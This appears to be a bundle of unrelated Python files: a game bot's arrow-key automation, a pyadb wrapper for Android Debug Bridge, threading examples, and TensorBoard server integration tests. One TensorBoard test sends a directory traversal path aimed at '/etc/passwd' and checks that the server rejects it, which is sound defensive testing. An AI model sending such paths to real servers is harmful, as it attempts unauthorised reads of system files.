self.pressed_keys.append("right")
# Hold the key down
CustomInput.press_key(CustomInput.key_map["right"], "right")
elif self.relx < -self.margin:
# Check if opposite key held down
if "right" in self.pressed_keys:
self.pressed_keys.remove("right")
CustomInput.release_key(CustomInput.key_map["right"], "right")
# Check that wasn't very recently pressed
if time.time() - self.last_press["left"] < 0.21:
pass
# Check that not already being held down
elif "left" not in self.pressed_keys:
self.last_press["left"] = time.time()
self.pressed_keys.append("left")
# Hold the key down
CustomInput.press_key(CustomInput.key_map["left"], "left")
else:
# Handling for case where = 0, need to remove both keys
if "right" in self.pressed_keys:
self.pressed_keys.remove("right")
CustomInput.release_key(CustomInput.key_map["right"], "right")
if "left" in self.pressed_keys:
self.pressed_keys.remove("left")
CustomInput.release_key(CustomInput.key_map["left"], "left")
# Handling for y-dir next
if self.rely > self.margin:
# Check if opposite key held down
if "down" in self.pressed_keys:
self.pressed_keys.remove("down")
CustomInput.release_key(CustomInput.key_map["down"], "down")
# Check that wasn't very recently pressed
if time.time() - self.last_press["up"] < 0.21:
pass
# Check that not already being held down
elif "up" not in self.pressed_keys:
self.last_press["up"] = time.time()
self.pressed_keys.append("up")
# Hold the key down
CustomInput.press_key(CustomInput.key_map["up"], "up")
elif self.rely < -self.margin:
# Check if opposite key held down
if "up" in self.pressed_keys:
self.pressed_keys.remove("up")
CustomInput.release_key(CustomInput.key_map["up"], "up")
# Check that wasn't very recently pressed
if time.time() - self.last_press["down"] < 0.21:
pass
# Check that not already being held down
elif "down" not in self.pressed_keys:
self.last_press["down"] = time.time()
self.pressed_keys.append("down")
# Hold the key down
CustomInput.press_key(CustomInput.key_map["down"], "down")
else:
# Handling for case where = 0, need to remove both keys
if "up" in self.pressed_keys:
self.pressed_keys.remove("up")
CustomInput.release_key(CustomInput.key_map["up"], "up")
if "down" in self.pressed_keys:
self.pressed_keys.remove("down")
CustomInput.release_key(CustomInput.key_map["down"], "down")
if __name__ == "__main__":
time.sleep(2)
with open("gamename.txt") as f:
gamename = f.readline()
# start = time.time()
# BotUtils.detect_xprompt(gamename)
# print("Time taken: {}s".format(time.time()-start))
# BotUtils.move_diagonal(749, 615, 22.5)
BotUtils.try_toggle_map_clicking(gamename)
|
__init__.py
|
from __future__ import print_function
import ctypes
import inspect
import shlex
import tempfile
import threading
from queue import Queue, Empty
from typing import List, Callable, Optional
from subprocess import \
CalledProcessError, \
call, \
Popen, \
PIPE
__author__ = 'Simon Lee, Viktor Malyi'
__email__ = 'leetsong.lc@gmail.com, v.stratus@gmail.com'
__version__ = '1.3.0'
Thread = threading.Thread
ThreadError = threading.ThreadError
#########################################
# Utilities
#########################################
def _underline(s: str) -> str:
"""
Underline a string
:param s: string to be underlined
:return: underlined string
"""
return '\033[4m' + s + '\033[0m'
def _from_proc_output(output: bytes) -> str:
"""
Convert proc output from bytes to str, and trim heading-
and tailing-spaces
:param output: output in bytes
:return: output in str
"""
return str(output, encoding='utf-8').strip(' \t\n')
class NonBlockingReader:
class TimeoutException(Exception):
pass
def __init__(self, stream):
self._stream = stream
self._queue = Queue()
self._thread = Thread(target=self._run)
self._thread.start()
def empty(self):
return self._queue.empty()
def readline(self, timeout=None):
"""
Read one line within time limit
:param timeout: time limit
:return: None for done reading, or throw a TimeoutException
"""
try:
return self._queue.get(block=timeout is not None, timeout=timeout)
except Empty:
if self._thread.is_alive(): # actually empty, and timeout
raise self.TimeoutException()
else: # thread is not alive, read done
return None
def close(self):
if self._thread.is_alive():
self._thread.join()
def _run(self):
for line in self._stream:
self._queue.put(line)
#########################################
# Pre-declaration
#########################################
class Adb:
pass
#########################################
# Global Options
#########################################
AdbGlobalOption = Callable[[Adb], List[str]]
class AdbGlobalOption_s(AdbGlobalOption):
# TODO: I have no idea by far how to dismiss this warning
def __call__(self, adb: Adb) -> List[str]:
return ['-s', adb._serial] if adb._serial is not None else []
#########################################
# Adb Commands
#########################################
class AdbCommand:
SHELL = 'shell'
EXEC_OUT = 'exec-out'
LOGCAT = 'logcat'
PULL = 'pull'
PUSH = 'push'
UNINSTALL = 'uninstall'
INSTALL = 'install'
DEVICES = 'devices'
FORWARD = 'forward'
REVERSE = 'reverse'
GET_SERIALNO = 'get-serialno'
WAIT_FOR_DEVICE = 'wait-for-device'
KILL_SERVER = 'kill-server'
START_SERVER = 'start-server'
GET_STATE = 'get-state'
REBOOT = 'reboot'
ROOT = 'root'
SYNC = 'sync'
EMU = 'emu'
VERSION = 'version'
BUGREPORT = 'bugreport'
##########################################
# Adb Poll Command Callback
##########################################
# An AdbPollCommandCallback is a function which accepts
# (whether timeout, the output of the command) as
# inputs, and returns a flag to terminate the execution
# (True for terminating, and o.w. False)
AdbPollCommandCallback = Callable[[bool, str], bool]
#########################################
# Adb Implementation
#########################################
class Adb:
EXECUTABLE = 'adb'
GLOBAL_OPTIONS: list = [
AdbGlobalOption_s(),
]
def __init__(self, log_command=True, log_output=True):
"""
Adb is a python interface for adb
:param log_command: whether enable logging the invoked adb command
:param log_output: whether enable logging the output of the invoked adb command
"""
self._serial = None
self._is_log_output_enabled = log_output
self._is_log_command_enabled = log_command
self._reset()
def enable_logging_command(self, enabled: bool = True):
"""
Enable or disable logging command
:param enabled: enable or not
:return:
"""
self._is_log_command_enabled = enabled
return self
def enable_logging_output(self, enabled: bool = True):
"""
Enable or disable logging output
:param enabled: enable or not
:return:
"""
self._is_log_output_enabled = enabled
return self
def is_log_output_enabled(self):
"""
As name shows
:return: as name shows
"""
return self._is_log_output_enabled
def is_log_command_enabled(self):
"""
As name shows
:return: as name shows
"""
return self._is_log_command_enabled
def s(self, serial):
"""
Temporarily set global option -s <serial>, not connected
:param serial: <serial>
:return: self
"""
self._serial = serial
return self
def is_connected(self):
"""
Whether connected an emulator or a device
:return: True if connected
"""
return self._serial is not None
def connect(self, serial: str):
"""
Permanently connect to an emulator with serial
:param serial: <serial>
:return: self
"""
if self.is_connected():
print('Error: already connect to %s' % self._serial)
return False
else:
self._serial = serial
return True
def disconnect(self):
"""
Disconnect from the connected devices/emulators
:return: True if successfully disconnected
"""
if self.is_connected():
self._serial = None
return True
else:
print('Error: no connection by far')
return False
def reconnect(self, serial: str):
"""
Reconnect to a new device/emulator
:param serial: serial no of the emulator/device
:return: True if successfully connected
"""
if self.is_connected():
self.disconnect()
return self.connect(serial)
def version(self):
"""
Display the version of pyadb
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.VERSION]
return self._exec_command(adb_sub_cmd)
def bugreport(self, dest_file: str = "default.log"):
"""
Prints dumpsys, dumpstate, and logcat data to the screen, for the purposes of bug reporting
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.BUGREPORT]
try:
dest_file_handler = open(dest_file, "w")
except IOError:
print("IOError: Failed to create a log file")
dest_file_handler = None
# We have to check if device is available or not before executing this command
# as pyadb bugreport will wait-for-device infinitely and does not come out of
# loop
# Execute only if device is available only
if self._is_device_available():
result = self._exec_command_to_file(adb_sub_cmd, dest_file_handler)
return result, "Success: Bug report saved to: " + dest_file
else:
return 0, "Device Not Found"
def push(self, src: List[str], dest: str, opts: Optional[list] = None):
"""
Push object from host to target
:param src: list of paths to source objects on host
:param dest: destination path on target
:param opts: options
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.PUSH, *src, dest, self._convert_opts(opts)]
return self._exec_command(adb_sub_cmd)
def pull(self, src: List[str], dest: str, opts: Optional[list] = None):
"""
Pull object from target to host
:param src: list of paths of objects on target
:param dest: destination path on host
:param opts: options
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.PULL, *src, dest, self._convert_opts(opts)]
return self._exec_command(adb_sub_cmd)
def devices(self, opts: Optional[list] = None):
"""
Get list of all available devices including emulators
:param opts: list command options (e.g. ["-l"])
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.DEVICES, self._convert_opts(opts)]
return self._exec_command(adb_sub_cmd)
def logcat(self, args):
"""
Display logcat logs
:param args: arguments to logcat
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.LOGCAT]
adb_sub_cmd.extend(shlex.split(args))
return self._exec_command(adb_sub_cmd)
def poll_logcat(self, args, callback: AdbPollCommandCallback, timeout: int):
"""
Display logcat logs
:param args: arguments to logcat
:param callback: callback to handle each line
:param timeout: timeout for polling
"""
adb_sub_cmd = [AdbCommand.LOGCAT]
adb_sub_cmd.extend(shlex.split(args))
try:
self._poll_cmd_output(adb_sub_cmd, timeout=timeout, callback=callback)
except CalledProcessError:
pass
def exec_out(self, cmd: str):
"""
Execute command until finished using exec-out on target
:param cmd: string shell command to execute
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.EXEC_OUT]
adb_sub_cmd.extend(shlex.split(cmd))
return self._exec_command(adb_sub_cmd)
def shell(self, cmd: str):
"""
Execute command until finished using shell on target
:param cmd: string shell command to execute
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.SHELL]
adb_sub_cmd.extend(shlex.split(cmd))
return self._exec_command(adb_sub_cmd)
def poll_out(self, cmd: str, callback: AdbPollCommandCallback,
timeout, shell=False):
"""
Execute command until finished using shell on target
:param cmd: string shell command to execute
:param callback: callback to handle each line
:param timeout: timeout for polling
:param shell: True for using shell else exec-out
:return: return code
"""
adb_sub_cmd = [AdbCommand.SHELL if shell else AdbCommand.EXEC_OUT]
adb_sub_cmd.extend(shlex.split(cmd))
return self._poll_cmd_output(adb_sub_cmd, timeout=timeout,
callback=callback)
def install(self, apk: str, opts: Optional[list] = None):
"""
Install *.apk on target
:param apk: string path to apk on host to install
:param opts: list command options (e.g. ["-r", "-a"])
:return: result of _exec_command() execution
"""
if opts is None:
opts = list()
adb_sub_cmd = [AdbCommand.INSTALL, self._convert_opts(opts), apk]
return self._exec_command(adb_sub_cmd)
def uninstall(self, app: str, opts: Optional[list] = None):
"""
Uninstall app from target
:param app: app name to uninstall from target (e.g. "com.example.android.valid")
:param opts: list command options (e.g. ["-r", "-a"])
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.UNINSTALL, self._convert_opts(opts), app]
return self._exec_command(adb_sub_cmd)
def forward(self, args):
"""
Forward local (host machine) port to remote (android device) port
:param args: arguments to forward
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.FORWARD]
adb_sub_cmd.extend(shlex.split(args))
return self._exec_command(adb_sub_cmd)
def reverse(self, args):
"""
Reverse remote (android device) port to local (host machine) port
:param args: arguments to forward
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.REVERSE]
adb_sub_cmd.extend(shlex.split(args))
return self._exec_command(adb_sub_cmd)
def reboot(self):
"""
Reboot the device
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.REBOOT]
return self._exec_command(adb_sub_cmd)
def root(self):
"""
Run adb using root user
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.ROOT]
return self._exec_command(adb_sub_cmd)
def get_serialno(self):
"""
Get serial number for all available target devices
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.GET_SERIALNO]
return self._exec_command(adb_sub_cmd)
def wait_for_device(self):
"""
Block execution until the device is online
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.WAIT_FOR_DEVICE]
return self._exec_command(adb_sub_cmd)
def sync(self):
"""
Copy host->device only if changed
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.SHELL, AdbCommand.SYNC]
return self._exec_command(adb_sub_cmd)
def emu(self, args):
"""
Run emulator commands
:param args: arguments to emu
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.EMU]
adb_sub_cmd.extend(shlex.split(args))
return self._exec_command(adb_sub_cmd)
def start_server(self):
"""
Startd pyadb server daemon on host
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.START_SERVER]
return self._exec_command(adb_sub_cmd)
def kill_server(self):
"""
Kill pyadb server daemon on host
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.KILL_SERVER]
return self._exec_command(adb_sub_cmd)
def get_state(self):
"""
Get state of device connected per pyadb
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.GET_STATE]
return self._exec_command(adb_sub_cmd)
def _reset(self):
"""
Reset self
:return: None
"""
if not self.is_connected():
self._serial = None
def _prepare(self):
"""
Prepare for executable and global options
:return: [executable, ...global_options]
"""
p = [Adb.EXECUTABLE]
for gop in Adb.GLOBAL_OPTIONS:
p.extend(gop(self))
return p
def _is_device_available(self):
"""
Private Function to check if device is available;
To be used by only functions inside module
:return: True or False
"""
result = self.get_serialno()
if result[1].strip() == "error: no devices/emulators found":
return False
else:
return True
def _convert_opts(self, opts: Optional[list]):
"""
Convert list with command options to single string value
with 'space' delimiter
:param opts: list with space-delimited values
:return: string with space-delimited values
"""
return ' '.join(opts) if opts is not None else ''
def _exec_command(self, adb_cmd: list):
"""
Execute adb_cmd and get return code and output
:param adb_cmd: list pyabd command to execute
:return: (returncode, output)
"""
buf = []
def callback(timeout, line):
if timeout:
return False
buf.append(line)
return False
try:
self._poll_cmd_output(adb_cmd, timeout=0, callback=callback)
except CalledProcessError as e:
return e.returncode, e.stderr
return 0, ''.join(buf)
def _poll_cmd_output(self, adb_cmd: list, timeout: int = 0,
callback: AdbPollCommandCallback = lambda _, __: False):
"""
Format pyadb command and execute it in shell, _poll_cmd_output will poll
stdout of adb_command for timeout ms to fetch the output each time,
:param adb_cmd: list pyadb command to execute
:param timeout: timeout in millisecond for polling
:param callback: for handling output
"""
t = tempfile.TemporaryFile()
final_adb_cmd = self._prepare()
for e in adb_cmd:
if e != '': # avoid items with empty string...
final_adb_cmd.append(e) # ... so that final command doesn't
# contain extra spaces
if self._is_log_command_enabled:
print(_underline('-> ' + ' '.join(final_adb_cmd) + '\n'))
proc = Popen(final_adb_cmd, stdout=PIPE, stderr=t) # binary output, 'cause no universal_newlines
reader = NonBlockingReader(proc.stdout) # binary reader
while True:
try:
binary_line = reader.readline(timeout / 1000) # read one binary line
except reader.TimeoutException:
if callback(True, ''): # callback to give opportunity for termination
proc.terminate()
break
continue
if binary_line is None: # done reading
rc = proc.poll() # check return code
if rc == 0: # succeeded
break
# failed, raise an exception
t.seek(0) # seek to 0 position of err
err = _from_proc_output(t.read())
reader.close()
t.close()
raise CalledProcessError(returncode=rc, cmd=' '.join(final_adb_cmd),
output=None, stderr=err)
try:
text_line = str(binary_line, encoding='utf-8') # convert to utf-8
except UnicodeDecodeError as e:
pass # ignored
else:
if callback(False, text_line):
proc.terminate()
break
reader.close()
t.close()
self._reset() # reset state after each command
def _exec_command_to_file(self, adb_cmd, dest_file_handler):
"""
Format pyadb command and execute it in shell and redirects to a file
:param adb_cmd: list pyadb command to execute
:param dest_file_handler: file handler to which output will be redirected
:return: 0 and writes shell command output to file if successful, otherwise
raise CalledProcessError exception and return error code
"""
t = tempfile.TemporaryFile()
final_adb_cmd = self._prepare()
for e in adb_cmd:
if e != '': # avoid items with empty string...
final_adb_cmd.append(e) # ... so that final command doesn't
# contain extra spaces
if self._is_log_command_enabled:
print('-> ' + ' '.join(final_adb_cmd) + '\n')
try:
call(final_adb_cmd, stdout=dest_file_handler, stderr=t)
except CalledProcessError as e:
raise e
finally:
t.close()
dest_file_handler.close()
self._reset() # reset state after each command
return 0
if __name__ == '__main__':
adb = Adb(False, False)
def test_logcat():
from threading import Thread
interrupted = False
def on_logcat(timeout, line) -> bool:
if interrupted:
return True
if timeout:
return False
if line is None or line == '':
return False
print(line.strip())
return False
thread = Thread(target=lambda: adb.poll_logcat('-s DroidTrace', callback=on_logcat, timeout=0))
try:
thread.start()
thread.join()
except KeyboardInterrupt:
interrupted = True
thread.join()
print('Exit')
def test_succeeded_shell():
rc, msg = adb.shell('cat /data/local/tmp/mnky')
print(rc)
print(msg)
def test_failed_shell():
rc, msg = adb.shell('cat /dta/local/tmp/mnky')
print(rc)
print(msg)
def test_getevent():
def on_event(timeout, line) -> bool:
if timeout:
return False
if line is None or line == '':
return False
print(line.strip())
return False
adb.poll_out('getevent -tlq', callback=on_event, timeout=0, shell=False)
test_logcat()
|
testing1.py
|
# Python program to illustrate the concept
# of threading
# importing the threading module
import threading
def print_cube(num):
"""
function to print cube of given num
"""
for i in range(num):
print("Cube: {}\n".format(num * num * num))
def print_square(num):
"""
function to print square of given num
"""
for i in range(num):
print("Square: {}\n".format(num * num))
# creating thread
t1 = threading.Thread(target=print_square, args=[10, ])
t2 = threading.Thread(target=print_cube, args=[10, ])
# starting thread 1
t1.start()
# starting thread 2
t2.start()
# wait until thread 1 is completely executed
t1.join()
# wait until thread 2 is completely executed
t2.join()
# both threads completely executed
print("Done!")
|
test.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 7 22:45:46 2020
@author: nicol
"""
import threading as mp
import time
global l
def main():
l = []
streamer = mp.Thread(target=stream_all, args=(l,))
streamer.daemon = True
streamer.start()
streamer.join()
print(l)
def stream_all(l):
l.append("hi")
return
main()
|
application_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for TensorBoard.
These tests start up a full-fledged TensorBoard server.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import gzip
import json
import numbers
import os
import shutil
import tempfile
import threading
from six import BytesIO
from six.moves import http_client
from six.moves import xrange # pylint: disable=redefined-builtin
from werkzeug import serving
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import summary_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.platform import test
from tensorflow.python.summary import event_multiplexer
from tensorflow.python.summary.writer import writer as writer_lib
from tensorflow.tensorboard.backend import application
class TensorboardServerTest(test.TestCase):
_only_use_meta_graph = False # Server data contains only a GraphDef
# Number of scalar-containing events to make.
_SCALAR_COUNT = 99
def setUp(self):
self.temp_dir = self._GenerateTestData()
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=application.DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=True)
plugins = {}
app = application.TensorBoardWSGIApp(
self.temp_dir, plugins, multiplexer, reload_interval=0)
self._server = serving.BaseWSGIServer('localhost', 0, app)
# 0 to pick an unused port.
self._server_thread = threading.Thread(target=self._server.serve_forever)
self._server_thread.daemon = True
self._server_thread.start()
self._connection = http_client.HTTPConnection(
'localhost', self._server.server_address[1])
def tearDown(self):
self._connection.close()
self._server.shutdown()
self._server.server_close()
def _get(self, path, headers=None):
"""Perform a GET request for the given path."""
if headers is None:
headers = {}
self._connection.request('GET', path, None, headers)
return self._connection.getresponse()
def _getJson(self, path):
"""Perform a GET request and decode the result as JSON."""
self._connection.request('GET', path)
response = self._connection.getresponse()
self.assertEqual(response.status, 200)
data = response.read()
if response.getheader('Content-Encoding') == 'gzip':
data = gzip.GzipFile('', 'rb', 9, BytesIO(data)).read()
return json.loads(data.decode('utf-8'))
def testBasicStartup(self):
"""Start the server up and then shut it down immediately."""
pass
def testRequestMainPage(self):
"""Navigate to the main page and verify that it returns a 200."""
response = self._get('/')
self.assertEqual(response.status, 200)
def testRequestNonexistentPage(self):
"""Request a page that doesn't exist; it should 404."""
response = self._get('/asdf')
self.assertEqual(response.status, 404)
def testDirectoryTraversal(self):
"""Attempt a directory traversal attack."""
response = self._get('/..' * 30 + '/etc/passwd')
self.assertEqual(response.status, 400)
def testLogdir(self):
"""Test the format of the data/logdir endpoint."""
parsed_object = self._getJson('/data/logdir')
self.assertEqual(parsed_object, {'logdir': self.temp_dir})
def testRuns(self):
"""Test the format of the /data/runs endpoint."""
run_json = self._getJson('/data/runs')
# Don't check the actual timestamp since it's time-dependent.
self.assertTrue(
isinstance(run_json['run1']['firstEventTimestamp'], numbers.Number))
del run_json['run1']['firstEventTimestamp']
self.assertEqual(
run_json,
{
'run1': {
'compressedHistograms': ['histogram'],
'scalars': ['simple_values'],
'histograms': ['histogram'],
'images': ['image'],
'audio': ['audio'],
# if only_use_meta_graph, the graph is from the metagraph
'graph': True,
'meta_graph': self._only_use_meta_graph,
'run_metadata': ['test run'],
'tensors': [],
}
})
def testApplicationPaths_getCached(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/',): # TODO(jart): '/app.js' in open source
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(
response.getheader('Cache-Control'),
'private, max-age=3600',
msg=path)
connection.close()
def testDataPaths_disableAllCaching(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/data/runs', '/data/logdir',
'/data/scalars?run=run1&tag=simple_values',
'/data/scalars?run=run1&tag=simple_values&format=csv',
'/data/images?run=run1&tag=image',
'/data/individualImage?run=run1&tag=image&index=0',
'/data/audio?run=run1&tag=audio',
'/data/run_metadata?run=run1&tag=test%20run'):
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(response.getheader('Expires'), '0', msg=path)
response.read()
connection.close()
def testHistograms(self):
"""Test the format of /data/histograms."""
self.assertEqual(
self._getJson('/data/histograms?tag=histogram&run=run1'),
[[0, 0, [0, 2.0, 3.0, 6.0, 5.0, [0.0, 1.0, 2.0], [1.0, 1.0, 1.0]]]])
def testImages(self):
"""Test listing images and retrieving an individual image."""
image_json = self._getJson('/data/images?tag=image&run=run1')
image_query = image_json[0]['query']
# We don't care about the format of the image query.
del image_json[0]['query']
self.assertEqual(image_json, [{
'wall_time': 0,
'step': 0,
'height': 1,
'width': 1
}])
response = self._get('/data/individualImage?%s' % image_query)
self.assertEqual(response.status, 200)
def testAudio(self):
"""Test listing audio and retrieving an individual audio clip."""
audio_json = self._getJson('/data/audio?tag=audio&run=run1')
audio_query = audio_json[0]['query']
# We don't care about the format of the audio query.
del audio_json[0]['query']
self.assertEqual(audio_json, [{
'wall_time': 0,
'step': 0,
'content_type': 'audio/wav'
}])
response = self._get('/data/individualAudio?%s' % audio_query)
self.assertEqual(response.status, 200)
def testGraph(self):
"""Test retrieving the graph definition."""
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs')
self.assertEqual(response.status, 200)
graph_pbtxt = response.read()
# Parse the graph from pbtxt into a graph message.
graph = graph_pb2.GraphDef()
graph = text_format.Parse(graph_pbtxt, graph)
self.assertEqual(len(graph.node), 2)
self.assertEqual(graph.node[0].name, 'a')
self.assertEqual(graph.node[1].name, 'b')
# Make sure the second node has an attribute that was filtered out because
# it was too large and was added to the "too large" attributes list.
self.assertEqual(list(graph.node[1].attr.keys()), ['_very_large_attrs'])
self.assertEqual(graph.node[1].attr['_very_large_attrs'].list.s,
[b'very_large_attr'])
def testAcceptGzip_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptAnyEncoding_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': '*'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptDoodleEncoding_doesNotCompressResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'doodle'})
self.assertEqual(response.status, 200)
self.assertIsNone(response.getheader('Content-Encoding'))
graph = text_format.Parse(response.read(), graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptGzip_doesNotCompressImage(self):
response = self._get('/data/individualImage?run=run1&tag=image&index=0',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), None)
def testRunMetadata(self):
"""Test retrieving the run metadata information."""
response = self._get('/data/run_metadata?run=run1&tag=test%20run')
self.assertEqual(response.status, 200)
run_metadata_pbtxt = response.read()
# Parse from pbtxt into a message.
run_metadata = config_pb2.RunMetadata()
text_format.Parse(run_metadata_pbtxt, run_metadata)
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
self.assertEqual(run_metadata.step_stats.dev_stats[0].device, 'test device')
def _GenerateTestData(self):
"""Generates the test data directory.
The test data has a single run named run1 which contains:
- a histogram
- an image at timestamp and step 0
- scalar events containing the value i at step 10 * i and wall time
100 * i, for i in [1, _SCALAR_COUNT).
- a graph definition
Returns:
temp_dir: The directory the test data is generated under.
"""
temp_dir = tempfile.mkdtemp(prefix=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir)
run1_path = os.path.join(temp_dir, 'run1')
os.makedirs(run1_path)
writer = writer_lib.FileWriter(run1_path)
histogram_value = summary_pb2.HistogramProto(
min=0,
max=2,
num=3,
sum=6,
sum_squares=5,
bucket_limit=[0, 1, 2],
bucket=[1, 1, 1])
# Add a simple graph event.
graph_def = graph_pb2.GraphDef()
node1 = graph_def.node.add()
node1.name = 'a'
node2 = graph_def.node.add()
node2.name = 'b'
node2.attr['very_large_attr'].s = b'a' * 2048 # 2 KB attribute
meta_graph_def = meta_graph_pb2.MetaGraphDef(graph_def=graph_def)
if self._only_use_meta_graph:
writer.add_meta_graph(meta_graph_def)
else:
writer.add_graph(graph_def)
# Add a simple run metadata event.
run_metadata = config_pb2.RunMetadata()
device_stats = run_metadata.step_stats.dev_stats.add()
device_stats.device = 'test device'
writer.add_run_metadata(run_metadata, 'test run')
# 1x1 transparent GIF.
encoded_image = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')
image_value = summary_pb2.Summary.Image(
height=1, width=1, colorspace=1, encoded_image_string=encoded_image)
audio_value = summary_pb2.Summary.Audio(
sample_rate=44100,
length_frames=22050,
num_channels=2,
encoded_audio_string=b'',
content_type='audio/wav')
writer.add_event(
event_pb2.Event(
wall_time=0,
step=0,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='histogram', histo=histogram_value),
summary_pb2.Summary.Value(
tag='image', image=image_value), summary_pb2.Summary.Value(
tag='audio', audio=audio_value)
])))
# Write 100 simple values.
for i in xrange(1, self._SCALAR_COUNT + 1):
writer.add_event(
event_pb2.Event(
# We use different values for wall time, step, and the value so we
# can tell them apart.
wall_time=100 * i,
step=10 * i,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='simple_values', simple_value=i)
])))
writer.flush()
writer.close()
return temp_dir
class TensorboardServerUsingMetagraphOnlyTest(TensorboardServerTest):
# Tests new ability to use only the MetaGraphDef
_only_use_meta_graph = True # Server data contains only a MetaGraphDef
class ParseEventFilesSpecTest(test.TestCase):
def testRunName(self):
logdir = 'lol:/cat'
expected = {'/cat': 'lol'}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testPathWithColonThatComesAfterASlash_isNotConsideredARunName(self):
logdir = '/lol:/cat'
expected = {'/lol:/cat': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testMultipleDirectories(self):
logdir = '/a,/b'
expected = {'/a': None, '/b': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testNormalizesPaths(self):
logdir = '/lol/.//cat/../cat'
expected = {'/lol/cat': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testAbsolutifies(self):
logdir = 'lol/cat'
expected = {os.path.realpath('lol/cat'): None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRespectsGCSPath(self):
logdir = 'gs://foo/path'
expected = {'gs://foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRespectsHDFSPath(self):
logdir = 'hdfs://foo/path'
expected = {'hdfs://foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testDoesNotExpandUserInGCSPath(self):
logdir = 'gs://~/foo/path'
expected = {'gs://~/foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testDoesNotNormalizeGCSPath(self):
logdir = 'gs://foo/./path//..'
expected = {'gs://foo/./path//..': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRunNameWithGCSPath(self):
logdir = 'lol:gs://foo/path'
expected = {'gs://foo/path': 'lol'}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
class TensorBoardAssetsTest(test.TestCase):
def testTagFound(self):
tag = application.get_tensorboard_tag()
self.assertTrue(tag)
app = application.standard_tensorboard_wsgi('', True, 60)
self.assertEqual(app.tag, tag)
if __name__ == '__main__':
test.main()
|
app.py
|
# ------------------------------------------------------------------------------
# Copyright IBM Corp. 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
